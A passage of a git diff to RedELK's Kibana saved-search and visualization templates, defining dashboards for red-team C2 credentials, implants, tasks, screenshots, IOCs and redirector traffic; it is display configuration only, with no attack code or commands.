"3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 215], "type": "search", "version": "1"} +{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 217], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 220], "type": "search", "version": "1"} +{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 223], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 225], "type": "search", "version": "1"} +{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 227], "type": "search", "version": "1"} +{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 229], "type": "search", "version": "1"} +{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\n \"highlightAll\": true,\n \"version\": true,\n \"query\": {\n \"language\": \"kuery\",\n \"query\": \"\"\n },\n \"indexRefName\": \"kibanaSavedObjectMeta.searchSourceJSON.index\",\n \"filter\": []\n}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1643015939090, 281], "type": "search", "version": "1"} +{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 231], "type": "search", "version": "1"} +{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 234], "type": "search", "version": "1"} +{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 237], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 240], "type": "search", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson index 1942ef49..5eb99f7c 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson @@ -1,47 +1,47 @@ -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2209], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2211], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2212], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2215], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2217], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.2", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2219], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.2", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2221], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK 